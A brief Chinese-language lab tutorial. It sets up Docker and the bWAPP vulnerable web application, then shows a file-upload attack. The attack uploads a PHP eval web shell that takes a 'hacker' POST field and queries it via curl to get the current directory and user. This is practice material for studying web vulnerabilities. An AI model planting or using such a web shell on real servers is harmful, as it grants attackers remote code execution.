1.环境搭建首先安装Docker Desktop
docker启动依赖于,bios开始虚拟化设置,启用Hyper-V,
具体操作步骤 控制面板\所有控制面板项\程序和功能\启用或关闭Windows功能,勾选Hyper-V,适用于Linux的Windows子系统,重新启动计算机。
解决方案B(如果已启用Hyper-V功能但不起作用)
使用Hypervisor启用
bcdedit /set hypervisorlaunchtype auto
参考链接:https://docs.docker.com/docker-for-windows/troubleshoot/#support
运行Docker Desktop 命令行拉取镜像:docker pull registry.cn-shanghai.aliyuncs.com/yhskc/bwapp 运行项目:docker run -d -p 0.0.0.0:80:80 registry.cn-shanghai.aliyuncs.com/yhskc/bwapp
访问网址并创建账号:http://127.0.0.1/install.php
上传木马文件
eval函数将接受的字符串当做代码执行,获取post请求中hacker字段。
<?php @eval($_POST['hacker']); ?>
选择上传方式,并点击图片下载获取地址
图片地址。
通过curl命令发送post请求。
getcwd() 获取当前路径
get_current_user() 获取当前用户